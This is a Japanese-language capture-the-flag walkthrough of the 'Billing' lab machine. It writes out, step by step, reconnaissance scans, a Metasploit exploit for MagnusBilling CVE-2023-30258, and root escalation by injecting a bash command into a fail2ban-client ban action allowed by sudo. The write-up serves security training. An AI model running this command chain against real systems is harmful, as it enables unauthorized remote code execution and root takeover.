
Billing room における CVE-2023-30258 を悪用した詳細なウォークスルーと、fail2ban の設定ミスによる権限昇格
作成者: Aditya Bhatt | オープンソースコントリビューター
このウォークスルーでは、Billing Roomに全力で取り組み、脆弱なMagnusBillingインスタンス、おいしい未認証RCE(CVE-2023-30258)、そして「私をrootにして」と叫んでいるfail2banのsudo設定ミスを紹介します。
このルームは、自動化された悪用と創造的な権限昇格を美しく融合させ、VoIP課金ソフトウェアに隠れた現実世界の欠陥を実践的に味わわせてくれます。 完全なPoC、解説、そして🗿な雰囲気とともに、初期偵察からルートシェルまで進みます。
マシンをデプロイした後、最初にあなたを襲うのは、設定ミスのファイアウォールのようなものです:
http://<machine_IP>/mbilling/
これはMagnusBillingのログインページです。それだけで警鐘が鳴ります — 魅力的なCVEプレイが始まることを知らせています。
究極の偵察コンボから始めます:
nmap -A -sV -p- 10.10.115.173
🧠 発見事項:
/mbilling/ 配下で他のHTTPサービスが利用可能次に、Gobusterで総当たり攻撃を実行します:
gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
🧠 発見事項:
次に、サイトのrobots.txtに何かスパイシーなものがないか確認します:
User-agent: *
Disallow: /mbilling/
ふむ…隠そうとするほど、ますます欲しくなりますね 😈
簡単なnetcatテストで、次の応答が確認されます:
Response: Error
Message: Missing action in request
これによりさらに確認:バックエンドはMagnusBillingであり、ポートはAsterisk Call Managerに関連しています。暗黒の技を召喚する時です 🧙
エクスプロイト: MagnusBillingにおける未認証リモートコード実行 モジュール:
exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
Metasploitを起動:
msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
次に要件を確認:
show options
次に以下を設定:
set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run
数秒後… ドーン。 Meterpreterセッションを獲得!
shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64
TTYシェルの起動を試行:
python3 -c 'import pty; pty.spawn("/bin/bash")'
次のように上位に移動を開始:
cd ..
cd ..
そして発見:
cd /home/magnus
cat user.txt
ナイス!しかし、まだ終わりではありません。rootが必要で、Magnusが秘密を囁いています。
sudoで何を実行できるか確認しましょう:
sudo -l
結果:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
さて、これは 🔥 です。fail2ban-clientを悪用して、banアクションを使用してrootとしてコマンドを実行できます。
fail2banを再起動:
sudo /usr/bin/fail2ban-client restart
次に、ルートフラグを盗むコマンドを注入:
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"
banをトリガー(これによりコマンドが実行):
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1
次に:
cat /tmp/root.txt
Root化完了。まるでボスのように。🗿🔥
robots.txtを確認し、奇妙なポートを掘り下げる。fail2ban-clientのような)sudo権限の設定ミスも同様に危険である。このボックスは、自動化された悪用と手動によるポストエクスプロイトの創造性の美しいバランスでした。 MagnusBilling RCEからfail2banルーティングまで、ペンテスターのプレイリストにぴったりの曲をすべて網羅しています 🎧🎯
レベルアップを目指す初心者でも、フラグを収集するベテラン戦士でも、これは必須のpwnです。
次回まで、 危険でい続けよ。好奇心を持ち続けよ。雄大でい続けよ。🗿
| 🔎 段階 | 💥 使用したアクション/ツール |
|---|
| 初期アクセス | Nmap + Gobusterを使用して/mbillingポータルとポート5038を発見 |
| 偵察による発見 | MagnusBilling CMS + Asterisk Call Manager |
| 悪用 | Metasploit経由でCVE-2023-30258 → Meterpreterシェル |
| 列挙 | /home/magnus/user.txtを発見 |
| 権限昇格 | fail2ban-clientのsudo NOPASSWDを悪用 → rootとしてRCE |
| ルートフラグ | fail2banペイロードインジェクション経由で/root/root.txtを取得 |